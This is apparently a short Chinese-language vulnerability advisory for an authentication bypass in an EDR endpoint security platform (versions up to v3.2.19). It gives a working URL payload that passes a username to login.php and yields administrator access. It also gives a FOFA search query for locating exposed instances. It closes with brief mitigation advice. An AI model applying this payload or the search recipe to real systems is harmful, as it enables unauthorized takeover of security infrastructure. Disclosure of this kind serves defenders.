一、漏洞描述
终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。
二、漏洞影响版本
<=v3.2.19
三、漏洞验证
payload:https://ip:xx/ui/login.php?user=任意用户名 注:用户名需要存在
1、fofo搜索 title="终端检测响应平台",访问
2、构造payload,访问https://ip:xx/ui/login.php?user=admin,成功未授权登录,查看当前版本发现为3.2.13
四、漏洞修复建议
1、部署到内网
2、限制特定IP地址访问
3、打补丁